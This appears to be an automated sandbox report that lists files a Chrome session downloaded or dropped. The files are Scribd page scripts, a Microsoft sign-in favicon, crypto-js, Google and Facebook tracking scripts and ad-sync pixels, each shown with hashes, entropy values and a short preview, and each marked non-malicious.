                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.44503024791353
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:aJ/qhSG+5iT75/lXFnEls70q82rhQvl6ZtlCzl4WissgzHu/hoMClZvD6DlJgCbf:aJ/qhM5iT75/lXFnEls70q82rhQvEZTj
                                                                                                                                                                                                                                                                                                                                                                                        MD5:52A8560347B92A56F62477B5552ED904
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:97062C9F09A67F4331106C44CF4FD5147294935C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:71B4D54B75C99AE6D72BB26C9B9191045397FDA7D084EF695EBF882E4F0A2872
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E9C27F3DFE0041D2BAFD6C18CA3FC25D1B13A1DC26DC79874EF459B2CD75FAEF955CB7F999AE7BDB715E35D181B67BE191C9890E46B6CD4CA85DBFB97E7D3A6F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[524],{75875:(e,t,n)=>{"use strict";n.d(t,{A:()=>d});var r=n(38544),o=n(62832),s=n.n(o),a=n(40880),i=n(96540),l=n(30686);function c({copyright:e,headingLevel:t,inline:n}){return i.createElement("div",{className:s()("auto__app_page_body_metadata_copyright","data_row copyright",{inline:n})},function(){let e=a.A.t("pdfs.sidebar.copyright_no_colon");return n&&(e=a.A.t("pdfs.sidebar.copyright")),i.createElement(l.A,{level:t},e)}(),function(){let t=`${String.fromCharCode(169)} ${e}`;return n&&(t=e),i.createElement("div",null,t)}())}c.defaultProps={headingLevel:3,inline:!0};const d=(0,r.Ng)((e=>({copyright:e.wordDocument.copyright_name})))(c)},77434:(e,t,n)=>{"use strict";n.d(t,{K:()=>d});var r=n(40880),o=n(96540),s=n(38544);const a="_2YHt5Y",i="n5d7Gp",l="_2Lyzye",c=({heading:e,text:t})=>o.createElement("div",{className:a},o.createElement("div",{className:i},e),o.createElement("div",{className:l},t)),d=()=>
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):17174
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                                                                                                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                                                                                                                                                                                                                                                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):621
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.673946009263606
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                                                                                                                                                                                                                                                                                                        MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 149 x 198, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):13524
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.982568633115377
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:lmENBHwwlbVoOEF9wxpstBNOfJmUyjuQnqlBsQ5:lXNBHwXLwYTwsUU2
                                                                                                                                                                                                                                                                                                                                                                                        MD5:0254571C8DC1E3240AF4C2A9F5BBCCE1
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:17F98C40FCC6920777AD5B50B88338D569ED2297
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:32AEB0105B1EB3EFDF4B9D064891524AEE39769C975523BD7A1D837BBA0DDD47
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A0EF9084D7A01253D20B39972AD15D749F160C94F2DD63AB8B0186B50D2F26F8C064FEAAD6ACA84D7056AB92D99BDFCBB4247E4DCFF63FEBC6A9680F294C4B0A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............f2$....gAMA......a.....sRGB.........PLTE.......................................................................................................................@L..........>J.................{{{..........................AM....BL.......=L....>L...........................>O.@K..........?Q~~~.......EK.?L....>G....EQ.@T.......\g..........DJ....DL.......<K...kkkwww......ccc....BTZZZ..........AH.BW.......:L.......;U...|z......AP.=R.......GU....`grrr....DF....=H.......LZ.AHfffppp....BS..........AP.......KR.hhh...........~.....IS.EI.T]....ttt.FM......TTT..........AH.]fnnn....w..AL....t......BL.....LLL....KT.@P............:R....S_^^^....Q`..........DW....GV....t..fk....DD.K].............{..or.............mo.Wa......<<<..................................s...o(:@.. .IDATx.XIo.G..^Y.4...ws.b."(J2$...4..2..9g....h.?.........Q........."...s.......$..w.....z.+..o...~+..b.6[....'O....o..b....k.k.b......3.M.q...'O.&.
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (60819), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):60819
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.4839527999983755
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:R8K6Znxmj9rlvCOhI64j7AtSPtNPU9ArHMLlk:RV6+jKOh4z
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D9C6DE0DF2BF028D93924AFF92487904
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6596050516DD12AF52D9B0E7B18ED837F1D81300
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:769A555DE553BABC35A3338F344DD7AA16260C93CEA2C7DB290707C90484E7CC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:6BE4940EEC0DCD70EFCF85EB21C5C7B827F4F3DFE2240A0DE259AB5C9835F179DDB8A2BA6250C73516A5BF8C9DD4DE3438A23CD2D162745FABA9314A18FA1615
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var W,O,I,U,K,X,L,l,j,T,t,N,q,e,Z,V,G,J,Q,Y,$,t1,e1,r1,i1,o1,n1,s,s1,c1,a1,h1,l1,o,f1,r,d1,u1,n,c,a,h,f,d,i=function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},o=t.lib={},n=o.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function()
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (971)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1320
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.668841022222747
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:kPPckWCjPI/QBK4akhdd1fPhsZOEfsOdSEnR+gIdx3PSp4pXkV20aT:/Sjrjj7d1fPhsoEkO0kqdPS+e2VT
                                                                                                                                                                                                                                                                                                                                                                                        MD5:AE93144EF72FC3BBE48F86635C939F8D
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4A06D34A5DAFE338D5F450EB249BE61878C71A43
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:ED918D8E95E136C3187031C0C38AEDFEACF24F80AE8F586C92080EC9471F0494
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B59B0AC5133ADD4F1C58EE6FF4D2D916CD4F2B2149BBE967ED45907B48638E0094C15C25CB7ABF08B4B0A523A66918304E97E9DC6AD267DE78E652ED6F13106F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://i.liadm.com/s/c/a-05td?duid=4b59e25de34b--01jeezr76nste791ys80m8qnan&euns=0&pt=500&s=&us_privacy=1-N-&version=v3.5.0&cd=.scribd.com&pv=fcc8441e-bec8-423c-9a94-14aa0e5d1ab4
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<html><body>..<script type="text/javascript">window.parent && window.parent.postMessage && window.parent.postMessage("_li_ss=CjcKBQgKEMMZCgYI3QEQwxkKBgilARDDGQoGCOEBEMMZCgYIgQEQwxkKBgiiARDDGQoGCNIBEMMZ","*");</script>...<img src="https://live.rezync.com/sync?c=0aa2530f29e4f4a05b5d5d9bb35d60c2&p=93c1662463a616a7155169889dd99651&pid=&us_privacy=1-N-"><img src="https://match.adsrvr.org/track/cmf/generic?ttd_pid=liveintent&ttd_tpi=1&gdpr=0&us_privacy=1-N-"><img src="https://d.turn.com/r/dd/id/L21rdC8xOTcxL2NpZC8xNzQ5ODczMjc1L3QvMg/url/https://i.liadm.com/s/53233?bidder_id=183658&bidder_uuid=$!%7BTURN_UUID%7D&us_privacy=1-N-"><img src="https://dis.criteo.com/dis/usersync.aspx?r=77&p=311&cp=liveintent&cu=1&url=https://i.liadm.com/s/28292?bidder_id%3D71340%26bidder_uuid%3D@@CRITEO_USERID@@&us_privacy=1-N-"><img src="https://b1sync.zemanta.com/usersync/liveintent/?cb=//i.liadm.com/s/35004?bidder_id%3D98254%26bidder_uuid%3D__ZUID__&us_privacy=1-N-"><img src="https://mid.rkdms.com/bct?pid=bcccb4
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):28
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.066108939837481
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:HHunOxiCkY:HIOkCkY
                                                                                                                                                                                                                                                                                                                                                                                        MD5:1E70E390CC05E39CE4662CB7B95DB0A7
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A55DB9F28B0607894439B07060C501766DD466D5
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:09FBBD6A0E57807E6564272D0805D169855B98B20314F19777247784ACC7B6F0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:48483AACCCB8AB0DC9088F8DE4865797790E60A2EE4E7C89D089C5EA555C08957F3D8A6946F5631BB62BF2F2383C04A5A81C83A6D434E9A6FB04B540F929D7D6
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwnmJA9fIUq3wBIFDVwvBTcSBQ1_pCqh?alt=proto
                                                                                                                                                                                                                                                                                                                                                                                        Preview:ChIKBw1cLwU3GgAKBw1/pCqhGgA=
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65468)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):271449
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.45467752444852
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:dqiC9656lo43c1zxB1DorwmN5/98VTaFeYnUMMDLbSzLbKSVLrOcQXL2:dqiC965W8B1Dorwy/OVT/naLVfQXL2
                                                                                                                                                                                                                                                                                                                                                                                        MD5:41A5C0C320EE8AF9B0561C118B6FB549
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FD2C606BF50B546476AD623BA9544102A07156C8
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C7734920393EEAA21CB3B9D3ABE03BE05FFD41FF9CFA3200D0C6AFACB9559B42
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:62FBE8BFDD11992EA311067E0EF79E48655F86C64F28F9E683B6F32D727AED73F4151D5C7E21F5C779D250D6E6FA457608C1360A9316826D25787B374B1DE3D5
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*! For license information please see client.min.js.LICENSE.txt */.(function(){var __webpack_modules__={7584:function(n,t,e){var i;!function(r,o){"use strict";var a="function",u="undefined",c="object",s="string",f="model",l="name",d="type",v="vendor",h="version",p="architecture",g="console",m="mobile",_="tablet",w="smarttv",y="wearable",b="embedded",E="Amazon",I="Apple",A="ASUS",S="BlackBerry",T="Firefox",R="Google",k="Huawei",N="LG",D="Microsoft",C="Motorola",O="Opera",x="Samsung",P="Sharp",M="Sony",L="Xiaomi",V="Zebra",F="Facebook",U=function(n){for(var t={},e=0;e<n.length;e++)t[n[e].toUpperCase()]=n[e];return t},z=function(n,t){return typeof n===s&&-1!==j(t).indexOf(j(n))},j=function(n){return n.toLowerCase()},G=function(n,t){if(typeof n===s)return n=n.replace(/^\s\s*/,""),typeof t===u?n:n.substring(0,350)},B=function(n,t){for(var e,i,r,u,s,f,l=0;l<t.length&&!s;){var d=t[l],v=t[l+1];for(e=i=0;e<d.length&&!s&&d[e];)if(s=d[e++].exec(n))for(r=0;r<v.length;r++)f=s[++i],typeof(u=v[r])==
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1002)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1080
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.320284316098408
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:iIeuoPXaPXAxyMqEJ2EF3eDHkWeTqSSEpRIZckWeTB9jUYVAUkWeTAlvVmk1N:iIToPXyXAxy9E7OTkXIEA6kXZqUkXEBB
                                                                                                                                                                                                                                                                                                                                                                                        MD5:5526C64AE72EE0563E3E46DAAD822254
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:529E538281C5139DFFC77D96FFBCADBD4687FD10
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B13724EBA63E49182C09AA6EF38B994EA60F974D83C9EC776810EE3D19C90945
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1C3E363324005C46480C8FFF3110B7355E200E7CAA15C97528D9625D36690AE9D1B16651DC660AE62B9BC8E06EA48ACE6A6730C76D5093BBF073AEDFD13BA543
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/42.4541ec.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[42],{52042:(r,e,t)=>{t.r(e),t.d(e,{default:()=>u});var n=t(38544),a=t(96540),o=t(37594),i=t(31815);function s(){return s=Object.assign?Object.assign.bind():function(r){for(var e=1;e<arguments.length;e++){var t=arguments[e];for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(r[n]=t[n])}return r},s.apply(this,arguments)}var c=t(78458);const u=(0,n.Ng)((r=>({country:r.user.country,documentType:r.wordDocument.type,personalizedArchiveOfferBucket:r.global.testAssignments.personalized_archive_offer,trialDuration:r.personalization.trialDuration})),((r,e)=>({handleClose:()=>r((0,c.JY)(e.id))})))((function(r){const{personalizedArchiveOfferBucket:e,trialDuration:t}=r;return a.createElement(o.h8,s({},r,{inModal:!0,personalizedArchiveOfferProps:{count:i.A.requiredUploads(),inUploadOfferBucket:i.A.isSubscribeOrUpload(e)||i.A.isUploadOrSubscribe(e)},userCountry:r.country,trialDuration:t}))}))}}]
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):52916
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                                                                                                                                                                                        MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9251)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):244801
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.453841413977933
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:/FLeYH8SRWJ/37OeR8NteqZEbkxZNsucrl0xYurPK713cCq:/FLeYcYWJzH8NNfFcrHurPK713Rq
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C9C37DBE6B077A4AAEEEA29AF4857656
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E9A790D720E436BA047D67C4D441E840D660433D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C4EB49795F7A703429E7012CEC0A556E6FAF6F551F07CD337F66C5A1EC3A5847
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:660F8CD397BAFA6D8F44BA4C2CD066AAF934A69B5E608D6CE63636240E339ACFF93AE9B72F6B01C4E29BF9C89B11A73C2D5D3F36EFEAD5194D138B38F7E0DFA4
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (23716)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):363281
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.584149921509324
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:oNcy253OdmnxuKqfrWAad0DMRoIbpgADF8lTPfDfJ312KQmh9aRGPVRu6jfh22JN:K25duKqzWKEz+nR19aRGPVoQj/
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C018A6DC9D58AE8151BC2687EF06B056
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CDFD4D4C18B1DAC1551824167291392A472F743C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9DEBCA767D5B9A694F8DCC98BA666DE21FAA3F7518E4309BEFE75B748ACD1F15
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:7A6A01D5150DEDEDF919D84081A08DDEAE3DAC1925ABFCCC5D1D52A834AA5C1C6085CC699B780BC9C0DAD836F9921591658F4B027B301074229FB4A679C9B73A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"155",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":true,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-443684-29","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","convert_case_to":1,"vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"cart"},{"function":"__awec","vtp_mode":"AUTO"
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 149 x 198, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
